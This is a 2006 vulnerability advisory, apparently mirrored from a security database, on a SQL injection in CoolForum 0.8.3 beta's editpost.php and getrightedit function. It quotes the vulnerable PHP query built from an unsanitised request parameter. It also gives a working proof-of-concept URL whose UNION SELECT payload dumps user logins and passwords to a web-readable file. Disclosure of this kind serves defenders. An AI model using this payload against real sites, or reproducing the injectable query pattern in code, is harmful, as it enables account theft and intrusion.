Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:12977
HistoryJun 05, 2006 - 12:00 a.m.

Critical SQL Injection in CoolForum

2006-06-0500:00:00
vulners.com
7

Type: SQL Injection
Risk: Critical
Product: CoolForum <= 0.8.3 beta


Vulnerability


// File: editpost.php
// Line 38
//
if(isset($_REQUEST['post'])) $post = intval($_REQUEST['post']);
else $post = 0;

// Line 77
//
$canedit = getrightedit($_REQUEST['post'],$_REQUEST['forumid']);

// File: admin/functions.php
// Line 623
//
function getrightedit($idpost,$forumid)
{
global $_MODORIGHTS, $sql, $_USER, $_FORUMCFG, $_PRE, $_GENERAL, $_PERMFORUM;
$query = $sql->query("SELECT idforum,idmembre,parent FROM ".$_PRE."posts WHERE idpost=".$idpost);
$j = mysql_fetch_array($query);

Proof Of Concept


http://[…]/editpost.php?forumid=1&post=3 UNION SELECT userid,login,password FROM cf_user INTO
OUTFILE '/www/web/resultat.txt'%23&parent=1&p=1

Credits


Ref : http://mgsdl.free.fr/advisories/coolforum083ba.txt
Note: Others SQL Injection exists but they are difficult to exploit
by DarkFig